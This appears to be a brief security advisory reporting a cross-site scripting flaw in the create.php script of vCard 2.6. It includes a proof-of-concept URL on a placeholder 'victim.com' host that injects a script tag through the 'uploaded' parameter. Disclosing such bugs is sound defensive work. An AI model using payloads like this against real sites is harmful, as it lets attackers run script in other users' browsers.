Discovered By : Hasadya Raed
Contact : [email protected]
Script: vCard 2.6 (c)2002
Bug in : create.php
Exploit :
http://www.victim.com/path/create.php?uploaded=">**********alert(1);</script>
–
Get your free email from http://bsdmail.com